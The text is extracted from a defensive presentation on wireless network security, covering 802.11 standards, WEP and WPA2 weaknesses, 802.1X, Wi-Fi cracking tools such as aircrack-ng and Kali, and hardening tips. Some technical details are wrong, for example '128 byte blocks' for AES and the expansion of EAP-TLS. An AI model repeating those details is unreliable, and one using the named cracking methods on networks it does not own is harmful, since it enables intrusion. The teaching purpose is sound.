1

Hacking Wireless Networks

What You Need To Know To

Protect Yours

Michael Votaw

RCC-E Network Monitoring Team Lead

Michael.s.votaw.ctr@mail.mil

CISSP, CCNA, ECIE-NAC

mailto:Michael.s.votaw.ctr@mail.mil

Overview

Ethical Concerns

CISSP Domains Covered

Wireless Primer: Back to the basics

Encryption Methods

The Tool Chest

Basic Methods for Securing

Code of Ethics Canons

Protect society, the common good, necessary public

trust and confidence, and the infrastructure.

Act honorably, honestly, justly, responsibly, and legally.

Provide diligent and competent service to principals.

Advance and protect the profession

CISSP Domains Addressed

Security and Risk Management - Confidentiality, integrity, and availability concepts

- Legal and regulatory issues

- Professional ethic

- Security policies, standards, procedures and guidelines

Asset Security

- Ownership (e.g. data owners, system owners)

- Protect privacy

- Data security controls

CISSP Domains Addressed (Continued)

Security Engineering

- Engineering processes using secure design principles

- Security architectures, designs, and solution elements

vulnerabilities

- Mobile systems vulnerabilities

- Cryptography

- Site and facility design secure principles

- Physical security

Communication and Network Security

- Secure network architecture design (e.g. IP & non-IP

protocols, segmentation)

- Secure network components

- Secure communication channels

- Network attacks 5

CISSP Domains Addressed (Continued)

Identity and Access Management

- Identification and authentication of people and devices

- Identity as a service (e.g. cloud identity)

- Third-party identity services (e.g. on-premise)

- Access control attacks

Security Assessment and Testing

- Assessment and test strategies

- Security process data (e.g. management and operational controls)

- Security control testing

- Security architectures vulnerabilities

6

IEEE 802.11 Standards

802.11

Introduced in June, 1997

Operated in the 2.4 GHz band

Operational bandwidth 22MHz

Data rates 1, 2 Mbps

Range 20m Indoor, 100m Outdoor

7

IEEE 802.11b

Introduced in September, 1999

Operates in the 2.4 GHz band

Operational bandwidth 22MHz

14 Channels available, but limited to 5 channel separation (3 useful)

Data rates 1, 2, 5.5, 11 Mbps

Range 35m Indoor, 140m Outdoor

8

IEEE 802.11a

Introduced in September, 1999

More expensive, not typically used by consumers

Operates in the 5 GHz band

Operational bandwidth 20MHz

Far more channels (22 in North America)

Data rates 6, 9, 12, 18, 24, 36, 48, 54 Mbps

Range 35m Indoor, 120m Outdoor

9

IEEE 802.11g

Introduced in June, 2003

Operates in the 2.4 GHz band

Operational bandwidth 20MHz

Data rates 6, 9, 12, 18, 24, 36, 48, 54 Mbps

Range 38m Indoor, 140m Outdoor

Backward compatible with 802.11b

10

IEEE 802.11n

Introduced in October, 2009

No new channels or frequencies introduced (uses 2.4GHz & 5 GHz)

Operational bandwidth 20MHz/40MHz

Up to 4 channels of MIMO (Multiple Input, Multiple Output)

Data rates (20MHz) 7.2, 14.4, 21.7, 28.9, 43.3, 57.8, 65, 72.2 Mbps

Data rates (40MHz) 15, 30, 45, 60, 90, 120, 135, 150 Mbps

Range 70m Indoor, 250m Outdoor

11

IEEE 802.11ac

Introduced in December, 2013

Uses only the 5 GHz band

Operational bandwidth 20/40/80/160 MHz

Up to 8 channels of MIMO (Multiple Input, Multiple Output)

Data rates 96.3Mbps (20MHz), 200Mbps (40MHz)

Data rates 433.3 (80MHz), 866.7Mbps (160MHz)

Range 35m Indoor, 115m Outdoor

6.77 Gbps possible

12

Channel Discussion 802.11b 2.4 GHz

13

Because of the bandwidth constraints, only three useful channels

are available

5 Channel separation is required at 20 and 22 MHz

Japan is the only country where channel 14 is allowed

Channel Discussion 802.11b/g/n 2.4 GHz

The 2.4GHz range is by far the

busiest range

Inexpensive equipment makes

it easy to deploy and use

Creates problems for 802.11n

because of channel usage

14

Channel Discussion 802.11a/n/ac 5GHz

15

Encryption methods - WEP

WEP (Wired Equivalent Privacy)

- Introduced with 802.11 in 1997

- Uses RC4 stream cipher for encryption

- Uses CRC-32 for data integrity

- Was successfully exploited in 2001

- Can be cracked in minutes with aircrack-ng

16

17

Encryption Methods WPA/WPA2 (802.11i)

WPA

- Introduced in 2003, but only temporary until release of WPA2

- Employs TKIP with a unique 128bit key for each packet

WPA2

- Released in 2004

- Far superior to WEP

- Uses CCMP (Counter Mode, Cipher Block Chaining, Message Authentication

Code Protocol). Its AES based encryption using 128 byte blocks with 128 bit

encryption

- Required for use in 802.11n and 802.11ac networks

- Still breakable with brute force attacks

18

Encryption Methods WPA2 (802.11i)

WPA2 offers two methods for encryption/authentication

WPA2-PSK (Also called WPA2-Personal)

- WPA2 Pre Shared Key

- Statically set on the Access Point and the wireless device

- Opens up the possibility for dictionary and brute force attacks

WPA2 Enterprise (802.1x authentication)

- Requires the configuration of a RADIUS server for authentication

- Keys are changed often and unique for each client

- Identity of all clients are known and MAC spoofing is effectively eliminated

19

802.1X Basic Components

User Supplicant Network Device Authentication Server

(RADIUS) Valid user (AD/RADIUS) Printer Phone Certificate-Based

Microsoft XP, Vista, 7, 8, 10 Mac OS X Linux Open1X Printers Phones

Cisco Brocade Extreme HP Many others

Windows AD FreeRADIUS OpenRADIUS Steel-Belted RADIUS Many others

802.1X Basic Flow

Username/Password

RADIUS Attributes

-Filter-Id

-Tunnel-Priv-Grp-ID

RADIUS Attributes

-User-Name

-NAS-IP-Address

-NAS-Port

-NAS-Port-Type

802.1X Message Exchange

All messages on client side are

ethertype 888E (EAPOL/PAE)

All messages between switch

and server are RADIUS packets

Most switch vendors enhance

this with multi-method and

multi-user authentication

802.1X Continued

Support for periodic re-auth, and manual re-auth

EAP Types - Industry Standard

- MD5 basic

- PEAP Microsoft & Cisco Protected EAP, Now dominate in the industry

- EAP-TLS (Transparent LAN Service) Requires a digital certificate on each supplicant (see RFC 2716)

EAP Types Proprietary

- EAP-TTLS (Tunneled TLS Authentication Protocol) - Juniper Software TTLS does not require digital

cert (see Internet Draft)

- LEAP Cisco Lightweight EAP (proprietary); Cisco moving to PEAP

802.1X on wireless

- Encryption, Rotating keys, Integration of Users and Enterprise Authentication

The Future 802.1AE

- Key exchange and encryption between clients, switches, and routers

The Tools

ANY PC or mobile device

- Nearly all wireless devices become a hacking tool with endless possibilities

- Using just a Pringles can (cantenna) wireless sniffing can be extended to nearly

a mile away. Its highly directional and easy to build.

- In 2008 Robert Graham and David Maynor of Errata Security demonstrated how

a jailbroken iPhone could be powered for days and used to hack internal

networks from a FedEx package delivered to a fictitious employee

BackTrack or the new version, Kali

- Freely available as a bootable ISO disc and loaded with hacking tools

24

Tools Included in MAC OSX

25

Tools Included in MAC OSX

26

Tools Included in MAC OSX

27

Brute Force / Dictionary Attack with Kali

28

Brute Force / Dictionary Attack with Kali

29

Brute Force / Dictionary Attack with Kali

30

Brute Force / Dictionary Attack with Kali

31

Brute Force / Dictionary Attack with Kali

32

Methods For Securing Wireless

Use long passwords for WPA2-Personal keys

Use of complex passwords not so great, but length matters more

Hide SSIDs when possible, but only slows down casual hackers

Enable MAC filtering WITH WPA2 pre-shared keys

Avoid the use of WPS (very easily cracked)

Utilize VPN encryption over wireless for sensitive data

Utilize 802.1x on wireless The safest way, but also very expensive

33

Questions?

34